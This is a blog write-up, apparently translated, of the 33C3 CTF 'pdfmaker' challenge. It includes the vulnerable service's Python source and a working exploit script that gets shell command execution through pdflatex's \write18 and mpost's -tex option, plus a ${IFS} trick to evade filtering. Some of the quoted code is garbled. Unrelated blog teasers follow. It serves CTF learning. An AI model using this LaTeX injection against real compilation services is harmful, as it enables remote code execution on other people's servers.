33C3 CTF Exploited the vulnerability of the Latex and in the task pdfmaker

This small write-up will focus on the analysis of one of the jobs with the recent CTF 33С3. Jobs are still available on the link now we shall consider the solution pdfmaker section Misc.

In fact, the description of the job:
Just a tiny applicationthat lets the user write some files and compile them with pdflatex. What can possibly go wrong?

nc 78.46.224.91 24242

The job came with a script, source code of the service:

pdfmaker_public.py
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-

import signal
import sys
from random import randint
import os, pipes
from shutil import rmtree
from shutil import copyfile
import subprocess

class PdfMaker:

def cmdparse(self, cmd):
fct = {
'help': self.helpmenu,
'?': self.helpmenu,
'create': self.create
'show': self.show
'compile': self.compilePDF,
'flag': self.flag
}.get(cmd, self.unknown)
return fct

def handle(self):
self.initConnection()
print " Welcome to p.d.f.maker! Send '?' or 'help' to get the help. Type 'exit' to disconnect."
instruction_counter = 0
while(instruction_counter < 77):
try:
cmd = (raw_input("> ")).strip().split()
if len(cmd) < 1:
continue
if cmd[0] == "exit":
self.endConnection()
return
print self.cmdparse(cmd[0])(cmd)
instruction_counter += 1
except Exception, e:
print "An Exception occured: ", e.args
self.endConnection()
break
print "Maximum number of instructions reached"
self.endConnection()

def initConnection(self):
cwd = os.getcwd()
self.directory = cwd + "/tmp/" + str(randint(0, 2**60))
while os.path.exists(self.directory):
self.directory = cwd + "/tmp/" + str(randint(0, 2**60))
os.makedirs(self.directory)
flag = self.directory + "/" + "33C3" + "%X" % randint(0, 2**31) + "%X" % randint(0, 2**31)
copyfile("flag", flag)


def endConnection(self):
if os.path.exists(self.directory):
rmtree(self.directory)

def unknown(self, cmd):
return "Unknown Command! Type 'help' or '?' to get help!"

def helpmenu(self, cmd):
if len(cmd) < 2:
return " Available commands: ?, help, create, show, compile.\n Type 'help COMMAND' to get information about the specific command."
if (cmd[1] == "create"):
return (" Create a file. Syntax: create TYPE NAME as\n"
"TYPE: type of the file. Possible types are log, tex, sty, mp, bib\n"
"NAME: name of the file (without ending type)\n"
"The created file will have the name NAME.TYPE")
elif (cmd[1] == "show"):
return (" Shows the content of a file. Syntax:  show  TYPE NAME\n"
"TYPE: type of the file. Possible types are log, tex, sty, mp, bib\n"
"NAME: name of the file (without type ending)")
elif (cmd[1] = = 'compile'):
return (" Compiles a tex file with the help of pdflatex. Syntax: compile NAME\n"
"NAME: name of the file (without type ending)")

def show(self, cmd):
if len(cmd) < 3:
return " Invalid number of parameters. Type 'show help' to get more info."
if not cmd[1] in ["log", "tex", "sty", "mp", "bib"]:
return " Invalid file ending. Only log, tex, sty and mp allowed"

filename = cmd[2] + "." + cmd[1]
full_filename = os.path.join(self.directory, filename)
full_filename = os.path.abspath(full_filename)

if full_filename.startswith(self.directory) and os.path.exists(full_filename):
with open(full_filename, "r") as file:
content = file.read()
else:
content = "File not found."
return content

def flag(self, cmd):
pass

def create(self, cmd):
if len(cmd) < 3:
return " Invalid number of parameters. Type 'help create' to get more info."
if not cmd[1] in ["log", "tex", "sty", "mp", "bib"]:
return " Invalid file ending. Only log, tex, sty and mp allowed"

filename = cmd[2] + "." + cmd[1]
full_filename = os.path.join(self.directory, filename)
full_filename = os.path.abspath(full_filename)

if not full_filename.startswith(self.directory):
return "Could not create file."

with open(full_filename, "w") as file:
print "File created. Type the content now and finish it by sending a line containing only '\q'."
while 1:
text = raw_input("");
if text.strip("\n") == "\q":
break
write_to_file = True;
for filter_item in ("..", "*", "/", "\\x"):
if filter_item in text:
write_to_file = False
break
if (write_to_file):
file.write(text + "\n")
return "Written to" + filename + "."

def compilePDF(self, cmd):
if (len(cmd) < 2):
return " Invalid number of parameters. Type 'help ' compile' to get more info."
filename = cmd[1] + ".tex"
full_filename = os.path.join(self.directory, filename)
full_filename = os.path.abspath(full_filename)
if not full_filename.startswith(self.directory) or not os.path.exists(full_filename):
return "Could not compile file."
compile_command = "cd" + self.directory + "&&pdflatex " + pipes.quote(full_filename)
compile_result = subprocess.check_output(compile_command, shell=True)
return compile_result

def signal_handler_sigint(signal, frame):
print 'Exiting...'
pdfmaker.endConnection()
sys.exit(0)

if __name__ == "__main__":
signal.signal(signal.SIGINT, signal_handler_sigint)

pdfmaker = PdfMaker()
pdfmaker.handle()


After learning the script, it becomes clear that we are dealing with pdflatex. Quick search in Google gives a link to article describing the recent vulnerability. Also define that we need a flag starts with 33C3 and next is a random sequence.

Use them and write a small script for easy execution of commands:

the 
#!/usr/bin/python3
import socket

def send(cmd):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("78.46.224.91", 24242))
x = "'verbatimtex
\documentclass{minimal}\begin{document}
etex beginfig (1) label(blah btex etex, origin);
endfig; \end{document} bye
\q
"'
s.send('create mp x\n'.encode())
s.send(x.encode())

s.send('create tex test\n'.encode())
test = "'\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (%s)>flag.tex" "x.mp"}
\end{document}
\q
"' %(cmd)
s.sendall(test.encode())
s.send('compile test\n'.encode())
s.send('show tex flag\n'.encode())
data = s.recv(90240)
data = data.decode()
s.close()
return data

while True:
cmd = input('> ')
cmd = cmd.replace(' ','${IFS}')
print(send(cmd))

After launch, it became clear that the slash symbol, it's not processed, and the command in which it is present is not performed. Shell we have left to bring the flag with the command:

the 
ls | grep 33 | xargs cat


Job passed, the flag was found!
Article based on information from habrahabr.ru

Comments

Post a Comment

Popular posts from this blog

Powershell and Cyrillic in the console (updated)

Image
In the development process is very often necessary to run a powershell script from a console application. What could be easier? the #test.ps1 & $PSScriptRoot\ConsoleApp.exe Examine the behavior of console applications when running them from the command line, using PowerShell and using PowerShell ISE: execution Result In PowerShell ISE, there is a problem with encoding, as the ISE expects the output to the encoding 1251. Use Google and find two problem solving: c use [Console]::OutputEncoding and through the powershell pipeline. Let's use the first solution: test2.ps1 $ErrorActionPreference = "Stop" function RunConsole($scriptBlock) { $encoding = [Console]::OutputEncoding [Console]::OutputEncoding = [System.Text.Encoding]::GetEncoding("cp866") try { &$scriptBlock } finally { [Console]::OutputEncoding = $encoding } } RunConsole { & $PSScriptRoot\ConsoleApp1.exe } execution Result At the command prompt, all is well, bu...
Read more

Active/Passive PostgreSQL Cluster, using Pacemaker, Corosync

Image
Description This article describes an example of configuring Active/Passive PostgreSQL cluster, using Pacemaker, Corosync. As the disk subsystem is considered the drive from the system data storage (CSV). Similar to the Windows Failover Cluster from Microsoft. Technical details: OS Version — CentOS 7.1 Version package pacemaker — 1.1.13-10 Package version pcs — 0.9.143 PostgreSQL — 9.4.6 As servers(2pcs) — iron server 2*12 CPU/ memory 94GB As a CSV(Cluster Shared Volume) — an array of class Mid-Range Hitachi RAID 1+0 Preparation of cluster nodes Rule /etc/hosts on both hosts and make the visibility of hosts to each other by short names, for example: the [root@node1 ~]# cat /etc/hosts 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 10.1.66.23 node1.local.lan node1 10.1.66.24 node2.local.lan node2 Also make exchange between servers using SSH keys and ...
Read more

Experience with the GPS logger Holux M-241. Working from under Windows, Mac OS X, Linux

Image
Inspired by the recent article on the GPS logger. I would like to tell you about GPS logger (GPS Receiver / Data Logger) Holux M-241, its features, capabilities and usability. May be someone this review will seem useful in the selection of such devices. The logger I needed to create tracks velopokatushki, forest walks skiing and snapping photos to coordinates. Bought this device at Dealextreme back in 2011 for about the same price for which he sold there now, something around 70$. There are of course the device is newer and cheaper, but for some features they lose this logger. (Photos of the device borrowed from Dealextreme) photos When choosing a logger, watching the small avaricious reviews of devices and spent a lot of time to form a view about the necessary for me features. In the end, I came to the following requirements: 1. Power supply — always removable, preferably standard batteries AA or AAA. After all, if you have to foray outside of civiliz...
Read more